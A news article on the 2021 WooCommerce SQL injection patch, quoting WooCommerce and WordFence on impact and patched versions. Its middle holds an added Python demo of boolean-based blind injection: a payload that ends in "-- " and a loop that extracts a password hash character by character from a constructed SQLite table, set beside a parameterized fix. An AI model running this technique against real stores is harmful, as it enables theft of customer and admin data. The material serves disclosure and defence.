WooCommerce has announced a patch for a critical vulnerability impacting millions of users. Publishers using the WooCommerce plugin or WooCommerce Blocks plugin are strongly advised to update their plugins if they have not yet done so automatically.
WooCommerce Enforces Automatic Update
The SQL injection vulnerability is considered severe enough that WooCommerce is pushing the patched releases to affected sites automatically. Even so, some publishers report that their sites have not received the update. Check the installed plugin version on your site and update manually if it is still on an unpatched release.
WooCommerce SQL Injection Vulnerability
A SQL injection lets an attacker alter the query a site sends to its database, so the database returns or modifies data the application never intended to expose, potentially including customer records and stored credentials (WordPress stores password hashes, not plaintext passwords). According to WooCommerce:
"If a store was affected, the exposed information will be specific to what that site is storing but could include order, customer, and administrative information."
WordFence’s announcement noted that this is a blind SQL injection: the query results are not shown to the attacker, who instead infers the data indirectly, either from whether the page responds differently for a true or false condition (boolean-based) or from how long the response takes (time-based). WordFence explained the impact:
"This vulnerability allowed unauthenticated attackers to access arbitrary data in an online store’s database."
"The WordFence Threat Intelligence team was able to develop proofs of concept for time-based and boolean-based blind injections and released an initial firewall rule to our Premium customers within hours of the patch."
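To show what the boolean-based blind injection technique WordFence describes looks like in practice, here is an added example. It is not code from WooCommerce, WordFence or this article, and it is not the actual vulnerable WooCommerce code path, which the article does not reproduce. It uses a constructed in-memory SQLite table standing in for a WordPress users table, a hypothetical `vulnerable_lookup` function that splices user input into the SQL text, an `extract_blind` routine that recovers a column value one character at a time using only yes/no answers, and a `safe_lookup` function showing the parameterized form the same payload cannot break out of.

```python
import sqlite3
import string

# Constructed sample data (not WooCommerce's real schema): a minimal stand-in
# for a WordPress users table holding login names and password hashes.
SAMPLE_USERS = [
    ("admin", "$P$BsecretHash7"),
    ("shopper", "$P$BotherHash99"),
]


def build_db():
    """Create an in-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT)"
    )
    conn.executemany(
        "INSERT INTO wp_users (user_login, user_pass) VALUES (?, ?)", SAMPLE_USERS
    )
    return conn


def vulnerable_lookup(conn, user_login):
    """Hypothetical vulnerable query: user input is spliced into the SQL text."""
    sql = f"SELECT ID FROM wp_users WHERE user_login = '{user_login}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, user_login):
    """Hardened form: the value travels as a bound parameter, never as SQL."""
    return conn.execute(
        "SELECT ID FROM wp_users WHERE user_login = ?", (user_login,)
    ).fetchall()


def boolean_oracle(lookup, conn, condition):
    """Ask the application one yes/no question.

    The attacker never sees query output, only whether the page behaved as if
    a row matched (boolean-based blind injection). The trailing '-- ' comments
    out the closing quote left over from the original query text.
    """
    payload = f"admin' AND ({condition}) -- "
    return len(lookup(conn, payload)) > 0


def extract_blind(lookup, conn, expr, max_len=64):
    """Recover the string value of `expr` one character at a time.

    `expr` is any scalar SQL expression (here a subquery selecting a hash).
    Each position costs at most len(alphabet) requests; extraction stops when
    no candidate matches, i.e. past the end of the value or at a character
    outside the attacker's alphabet.
    """
    alphabet = string.ascii_letters + string.digits + "$./"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            # SQLite's default BINARY collation makes '=' case-sensitive,
            # so each probe distinguishes 'a' from 'A'.
            if boolean_oracle(lookup, conn, f"SUBSTR(({expr}), {pos}, 1) = '{ch}'"):
                recovered += ch
                break
        else:
            return recovered
    return recovered


if __name__ == "__main__":
    db = build_db()
    target = "SELECT user_pass FROM wp_users WHERE user_login = 'admin'"
    print("vulnerable:", extract_blind(vulnerable_lookup, db, target))
    print("parameterized, same payload:", safe_lookup(db, "admin' AND (1=1) -- "))
```

Against `vulnerable_lookup` the loop recovers the admin hash in full with roughly a thousand requests; against `safe_lookup` every probe is a literal login name that matches nothing, so nothing leaks. A time-based variant uses the same loop but replaces the row-present check with a database-side delay (for example MySQL's `SLEEP()`) and measures response time, which is why WordFence could build both kinds of proof of concept from one injection point. In WordPress plugin code the equivalent of the bound parameter above is `$wpdb->prepare()`.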
Have WooCommerce Sites Been Compromised?
Currently, there is no evidence of widespread attacks compromising WooCommerce sites. WordFence stated:
"WordFence Threat Intelligence has found extremely limited evidence of these attempts and it is likely that such attempts were highly targeted."
WooCommerce Software Version Branches
WooCommerce releases are grouped into branches by major version: 3.x, 4.x and the current 5.x. Moving from 4.x to 5.x is a major upgrade, whereas a point release within a branch (for example 4.8.0 to 4.8.1) is meant to be a drop-in fix.
Some publishers may find it disruptive to jump from 4.x to 5.x. To accommodate them, WooCommerce released a patched point release for each affected branch rather than only for the latest version. A site on WooCommerce 4.8.x, for example, should update to at least version 4.8.1, the patched release for that branch.
However, the official announcement recommends updating to the latest version of WooCommerce, currently version 5.5.1:
"…we still highly recommend you ensure that you’re using the latest versions of WooCommerce and WooCommerce Blocks (5.5.1)."
This recommendation has caused some confusion among publishers about how far they actually need to update. One user asked whether version 4.8.1 is safe, to which WooCommerce responded:
"As this critical vulnerability concerns the WooCommerce plugin, we highly recommend ensuring this is up to date first."
"The version you mention, 4.8.1, contains the security patch so there’s nothing else you need to do here until you’re ready to update to the latest version (5.5.1)."
Citations
Official WooCommerce Announcement
Critical Vulnerability Detected in WooCommerce on July 13, 2021 – What You Need to Know
WordFence Report and Analysis of the Vulnerability
Critical SQL Injection Vulnerability Patched in WooCommerce